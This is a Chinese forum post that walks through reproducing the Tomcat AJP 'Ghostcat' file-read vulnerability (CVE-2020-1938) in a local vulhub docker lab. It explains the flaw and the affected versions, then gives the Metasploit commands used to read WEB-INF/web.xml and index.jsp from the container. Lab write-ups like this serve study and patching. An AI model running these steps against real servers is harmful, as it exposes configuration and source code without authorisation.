登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
签到
每天签到奖励2-10圆
导读
排行榜
TG频道
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
VIP申请
VIP网盘
网盘
联系我们
发帖说明
每日签到
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
安全
›
【vulhub】tomcat CVE-2020-1938(AJP漏洞)
【vulhub】tomcat CVE-2020-1938(AJP漏洞)
[ 复制链接 ]
闻人莹华
2025-6-1 21:00:01
渗透环境
攻击机: 192.168.66.130(Kali)
漏洞收录于:vulhub/tomcat/CVE-2020-1938
漏洞详情
也被称为“Ghostcat”漏洞,是一个影响Apache Tomcat服务器的严重安全漏洞。
漏洞原理
Tomcat默认在server.xml中开启
AJP
协议端口(默认8009),用于与其他Web服务器(如Apache HTTPD)通信。由于AJP协议在处理请求时未对用户输入充分验证,攻击者可通过构造恶意请求操控以下三个关键属性:
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
通过控制这些属性,攻击者可读取或包含webapp目录下的任意文件(如WEB-INF/web.xml、源代码等),甚至结合文件上传功能实现远程代码执行(RCE)
受影响版本
Apache Tomcat 6(全版本)
Apache Tomcat 7(7.0.0至7.0.99)
Apache Tomcat 8(8.0.0至8.5.50)
Apache Tomcat 9(9.0.0至9.0.30)
漏洞触发条件
开启AJP协议端口
:默认情况下,Tomcat的AJP连接器(8009端口)监听所有IP地址(0.0.0.0)。
受影响版本
:使用存在漏洞的Tomcat版本且未升级修复。
复现漏洞
启动环境
vulhub启动漏洞环境
docker-compose up -d
复制代码
可以看到,该容器确实在监听所有IP地址的8009端口
漏洞利用
可以使用msf来验证漏洞,msf中默认的filename值为/WEB-INF/web.xml,在靶机中对应的路径实际上是/usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml,也就是说,利用该漏洞只能读取到/usr/local/tomcat/webapps/ROOT/下的文件。
msfconsole
search cve-2020-1938
use 0
show options
set rhosts 127.0.0.1 # 漏洞环境是部署在本地的docker容器中的
run
复制代码
红框中的内容就是WEB-INF/web.xml,能够成功读到,说明漏洞存在。
也可以选择其他文件,如index.jsp,其完整路径为/usr/local/tomcat/webapps/ROOT/index.jsp
set filename /index.jsp
run
复制代码
也能够读到jsp文件源码
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
vulhub
tomcat
CVE
2020
1938
相关帖子
Spring Boot 使用 Tomcat 作为容器时访问根 context-path 302分析
使用自签名证书,为Tomcat配置HTTPS
CVE-2018-8715 AppWeb认证绕过漏洞 (复现)
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
Sevlet与Tomcat
漏洞通报 — CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
Struts2 S2-066(CVE-2023-50164)漏洞复现
Tomcat中启用h3的方法是什么
深入解析Tomcat类加载器:为何及如何打破Java双亲委派模型
PWN手的成长之路-03-bjdctf_2020_babystack
vip免费申请,1年只需15美金$
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
Spring Boot 使用 Tomcat 作为容器时访问根 context-path 302分析
0
769
岳娅纯
2025-06-30
安全
使用自签名证书,为Tomcat配置HTTPS
0
360
数察啜
2025-07-10
安全
CVE-2018-8715 AppWeb认证绕过漏洞 (复现)
0
473
左优扬
2025-07-29
安全
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
0
262
呈步
2025-07-29
业界
Sevlet与Tomcat
0
513
绂染
2025-08-22
安全
漏洞通报 — CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
0
94
咒卖箴
2025-09-12
安全
Struts2 S2-066(CVE-2023-50164)漏洞复现
0
152
蓝娅萍
2025-09-26
安全
Tomcat中启用h3的方法是什么
0
66
娥搽裙
2025-09-28
业界
深入解析Tomcat类加载器:为何及如何打破Java双亲委派模型
0
878
呵烘稿
2025-10-01
安全
PWN手的成长之路-03-bjdctf_2020_babystack
0
714
申倩语
2025-10-06
回复
(1)
羔迪
15 小时前
回复
使用道具
举报
照妖镜
前排留名,哈哈哈
vip免费申请,1年只需15美金$
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
闻人莹华
15 小时前
关注
0
粉丝关注
20
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
anyue1937
9994888
dage888
999994
3934307807
993678
4
富账慕
9995
5
邹语彤
9991
6
刎唇
9993
7
聚怪闩
9972
8
匝抽
9986
9
烯八
9966
10
筒濂
9974
查看更多